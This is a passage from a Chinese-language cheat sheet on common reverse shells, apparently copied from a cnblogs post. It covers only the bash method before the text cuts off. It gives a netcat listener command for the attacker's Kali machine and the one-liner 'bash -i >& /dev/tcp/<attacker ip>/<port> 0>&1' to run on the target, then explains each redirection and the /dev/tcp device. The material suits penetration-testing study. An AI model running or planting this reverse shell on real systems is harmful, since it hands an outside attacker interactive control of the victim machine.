常见反弹shell总结:
原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14204882.html
一、bash反弹
通用
① 在kali机里面开启端口监听:
nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用
② 在目标主机上执行:
bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号
③ 解释
bash -i: 打开一个交互的bash
.>&: 标准错误输出重定向到标准输出
/dev/tcp/x.x.x.x/port : 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口
0>&1: 标准输入重定向到标准输出,实现你与反弹出来的shell的交互
/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。
④ 补充
linux she